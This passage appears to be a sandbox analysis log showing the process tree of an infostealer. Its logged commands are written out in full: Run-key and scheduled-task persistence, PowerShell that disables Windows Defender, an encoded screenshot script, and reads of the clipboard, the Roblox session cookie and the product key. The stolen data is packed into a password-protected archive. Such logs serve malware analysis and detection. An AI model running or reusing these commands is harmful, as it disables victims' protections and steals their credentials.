C:\Users\Admin\AppData\Local\Temp\Files\jerniuiopu.exe"C:\Users\Admin\AppData\Local\Temp\Files\jerniuiopu.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4736 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "NET framework" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\jerniuiopu.exe" /rl HIGHEST /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5012
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Aquarius.exe"C:\Users\Admin\AppData\Local\Temp\Files\Aquarius.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4516 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B5F2.tmp\B5F3.tmp\B5F4.bat C:\Users\Admin\AppData\Local\Temp\Files\Aquarius.exe"3⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4252 -
C:\Windows\system32\timeout.exetimeout 14⤵PID:1308
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f4⤵
- Adds Run key to start application
PID:2272
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f4⤵
- Adds Run key to start application
PID:952
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f4⤵PID:3536
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f4⤵PID:4416
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3164 -
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3108 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'"6⤵
- Suspicious use of WriteProcessMemory
PID:4304 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2684
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"6⤵
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3328
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()""6⤵
- Suspicious use of WriteProcessMemory
PID:640 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()"7⤵PID:1976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"6⤵
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Windows\system32\tasklist.exetasklist /FO LIST7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:940
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"6⤵
- Suspicious use of WriteProcessMemory
PID:4988 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid7⤵
- Suspicious use of AdjustPrivilegeToken
PID:4964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"6⤵PID:2692
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 27⤵PID:2128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"6⤵PID:2056
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 27⤵PID:4072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"6⤵PID:3796
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name7⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:2820
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"6⤵PID:3236
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name7⤵
- Detects videocard installed
PID:4888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"6⤵PID:1016
-
C:\Windows\system32\tasklist.exetasklist /FO LIST7⤵
- Enumerates processes with tasklist
PID:2764
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"6⤵PID:1336
-
C:\Windows\system32\tasklist.exetasklist /FO LIST7⤵
- Enumerates processes with tasklist
PID:4692
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"6⤵PID:4100
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName7⤵PID:4596
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"6⤵
- Clipboard Data
PID:3704 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard7⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:2480
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"6⤵PID:2208
-
C:\Windows\system32\tasklist.exetasklist /FO LIST7⤵
- Enumerates processes with tasklist
PID:1276
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"6⤵PID:2724
-
C:\Windows\system32\tree.comtree /A /F7⤵PID:3056
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"6⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:408 -
C:\Windows\system32\netsh.exenetsh wlan show profile7⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"6⤵PID:4820
-
C:\Windows\system32\systeminfo.exesysteminfo7⤵
- Gathers system information
PID:4304
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"6⤵PID:736
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:2820
-
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath7⤵PID:1304
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="6⤵PID:4564
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=7⤵
- Suspicious behavior: EnumeratesProcesses
PID:1552 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\423asvt2\423asvt2.cmdline"8⤵PID:5976
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE704.tmp" "c:\Users\Admin\AppData\Local\Temp\423asvt2\CSCBACEDEDA80F6495296225CE99EED4454.TMP"9⤵PID:2324
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"6⤵PID:4408
-
C:\Windows\system32\tree.comtree /A /F7⤵PID:2988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"6⤵PID:4764
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts7⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:5368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"6⤵PID:5340
-
C:\Windows\system32\tree.comtree /A /F7⤵PID:5652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"6⤵PID:5544
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts7⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:5756
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"6⤵PID:5880
-
C:\Windows\system32\tree.comtree /A /F7⤵PID:6032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"6⤵PID:5964
-
C:\Windows\system32\tasklist.exetasklist /FO LIST7⤵
- Enumerates processes with tasklist
PID:6080
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"6⤵PID:6112
-
C:\Windows\system32\tree.comtree /A /F7⤵PID:640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"6⤵PID:5156
-
C:\Windows\system32\tree.comtree /A /F7⤵PID:2988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"6⤵PID:6052
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:6032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"6⤵PID:5148
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY7⤵
- Suspicious behavior: EnumeratesProcesses
PID:5696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"6⤵PID:5376
-
C:\Windows\system32\getmac.exegetmac7⤵PID:5400
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI31642\rar.exe a -r -hp"Aquarius" "C:\Users\Admin\AppData\Local\Temp\WGArS.zip" *"6⤵PID:5408
-
C:\Users\Admin\AppData\Local\Temp\_MEI31642\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI31642\rar.exe a -r -hp"Aquarius" "C:\Users\Admin\AppData\Local\Temp\WGArS.zip" *7⤵
- Executes dropped EXE
PID:2468
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"6⤵PID:416
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption7⤵PID:5580
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"6⤵PID:4112
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory7⤵PID:5964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"6⤵PID:6012
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid7⤵PID:5888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"6⤵PID:4304
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2436
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"6⤵PID:4624
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name7⤵
- Detects videocard installed
PID:5504
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"6⤵PID:5216
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault7⤵
- Suspicious behavior: EnumeratesProcesses
PID:3096
-
-
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4388 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "WindowsDataUpdater" /sc ONLOGON /tr "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:1700
-
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3460 -
